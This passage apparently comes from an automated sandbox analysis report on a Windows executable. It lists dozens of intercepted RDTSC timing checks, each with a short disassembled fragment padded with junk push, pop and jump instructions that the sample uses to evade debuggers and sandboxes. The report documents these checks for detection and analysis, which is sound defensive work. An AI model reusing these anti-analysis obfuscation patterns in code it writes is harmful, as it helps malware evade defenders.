                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6290C0 second address: 6290C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 629200 second address: 62920C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007FC69CE9FC56h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 62920C second address: 629210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 629210 second address: 629233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC69CE9FC5Ch 0x0000000e jmp 00007FC69CE9FC5Eh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6294E9 second address: 6294ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6294ED second address: 6294F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 62E4F4 second address: 62E515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FC69CB9B4A6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FC69CB9B4B0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 62E515 second address: 62E53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC69CE9FC5Ah 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FC69CE9FC58h 0x00000013 jmp 00007FC69CE9FC5Dh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 56DB80 second address: 56DB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636332 second address: 636336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636336 second address: 63633A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636469 second address: 63648A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC69CE9FC5Ch 0x0000000f jmp 00007FC69CE9FC5Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636921 second address: 636927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636927 second address: 636949 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC69CE9FC64h 0x0000000c jbe 00007FC69CE9FC56h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636EAE second address: 636EB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636EB3 second address: 636EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 637022 second address: 63703A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC69CB9B4ACh 0x0000000e js 00007FC69CB9B4A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 63703A second address: 637040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 637040 second address: 637044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 637044 second address: 637048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 637048 second address: 637061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CB9B4AEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 637061 second address: 63706A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 63706A second address: 63706E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 63706E second address: 637072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 638079 second address: 63807F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 635E9B second address: 635EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 js 00007FC69CE9FC60h 0x0000000d jmp 00007FC69CE9FC5Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 647ECC second address: 647ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 647ED5 second address: 647EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 647EDB second address: 647EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 647EDF second address: 647EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 647EE3 second address: 647F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007FC69CB9B4ACh 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FC69CB9B4B1h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 652C56 second address: 652C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jmp 00007FC69CE9FC60h 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 662290 second address: 662299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 662299 second address: 6622F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007FC69CE9FC5Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FC69CE9FC6Ch 0x00000014 jmp 00007FC69CE9FC64h 0x00000019 push edx 0x0000001a pop edx 0x0000001b pushad 0x0000001c jmp 00007FC69CE9FC5Ah 0x00000021 jmp 00007FC69CE9FC65h 0x00000026 jmp 00007FC69CE9FC5Dh 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6686D3 second address: 6686EF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC69CB9B4A6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007FC69CB9B4AAh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6686EF second address: 6686F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668847 second address: 66884B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6689C3 second address: 6689F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69CE9FC64h 0x00000008 js 00007FC69CE9FC56h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FC69CE9FC5Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6689F8 second address: 6689FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6689FE second address: 668A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668A08 second address: 668A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668A0D second address: 668A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 je 00007FC69CE9FC56h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668A1F second address: 668A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668CE5 second address: 668CFB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FC69CE9FC5Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668CFB second address: 668D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jp 00007FC69CB9B4A6h 0x0000000c popad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668FF3 second address: 668FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 66997D second address: 669982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 669982 second address: 669993 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007FC69CE9FC56h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 669993 second address: 669997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 66EAF0 second address: 66EB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CE9FC61h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 671571 second address: 67157D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 67157D second address: 671587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 671587 second address: 6715A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC69CB9B4B7h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6A5129 second address: 6A5135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FC69CE9FC56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6A5135 second address: 6A514B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC69CB9B4ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6A514B second address: 6A5156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6A5156 second address: 6A5177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6A5177 second address: 6A517B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6A4B70 second address: 6A4B8C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007FC69CB9B4A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jne 00007FC69CB9B4A6h 0x00000013 pop ebx 0x00000014 js 00007FC69CB9B4ACh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6A676D second address: 6A6771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6A6771 second address: 6A6777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6AA968 second address: 6AA979 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6AA979 second address: 6AA97D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6AA97D second address: 6AA9BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push esi 0x0000000c mov dx, F79Fh 0x00000010 pop edx 0x00000011 push 00000004h 0x00000013 adc dl, FFFFFFB6h 0x00000016 push 1CDD30BFh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC69CE9FC64h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6AA9BE second address: 6AA9C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6AABF2 second address: 6AABF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6AABF7 second address: 6AAC8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC69CB9B4A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 jnc 00007FC69CB9B4A8h 0x00000016 pop esi 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FC69CB9B4A8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 jmp 00007FC69CB9B4B6h 0x00000037 push dword ptr [ebp+122D2574h] 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007FC69CB9B4A8h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 call 00007FC69CB9B4B4h 0x0000005c push esi 0x0000005d mov dh, ah 0x0000005f pop edx 0x00000060 pop edx 0x00000061 push 6BAE690Bh 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6AC68D second address: 6AC691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6AC691 second address: 6AC6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CB9B4B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007FC69CB9B4A6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6AE1B8 second address: 6AE1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 581D76 second address: 581D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 47F02C0 second address: 47F02C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 47F02C7 second address: 47F030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FC69CB9B4ACh 0x0000000f sub ax, 7C38h 0x00000014 jmp 00007FC69CB9B4ABh 0x00000019 popfd 0x0000001a popad 0x0000001b mov dword ptr [esp], ebp 0x0000001e pushad 0x0000001f mov di, 6C26h 0x00000023 mov dl, 24h 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 mov si, F87Bh 0x0000002d mov ax, A157h 0x00000031 popad 0x00000032 mov edx, dword ptr [ebp+0Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 47F030F second address: 47F031E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810720 second address: 4810726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810726 second address: 481072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 481072A second address: 4810749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC69CB9B4B4h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810749 second address: 481074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 481074F second address: 4810753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810753 second address: 48107B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC69CE9FC5Ch 0x00000013 adc esi, 38038208h 0x00000019 jmp 00007FC69CE9FC5Bh 0x0000001e popfd 0x0000001f movzx eax, di 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007FC69CE9FC62h 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC69CE9FC67h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48107B8 second address: 48107D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4B4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48107D0 second address: 48107D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48107D4 second address: 481082F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f mov bl, ch 0x00000011 popad 0x00000012 push ecx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC69CB9B4B3h 0x0000001a or eax, 55EDD26Eh 0x00000020 jmp 00007FC69CB9B4B9h 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esp], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC69CB9B4ADh 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48108EC second address: 4810915 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 46F25ED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FC69CE9FC66h 0x00000014 pop eax 0x00000015 mov ecx, edx 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810915 second address: 481092C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4B3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810970 second address: 4810974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810974 second address: 481097A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
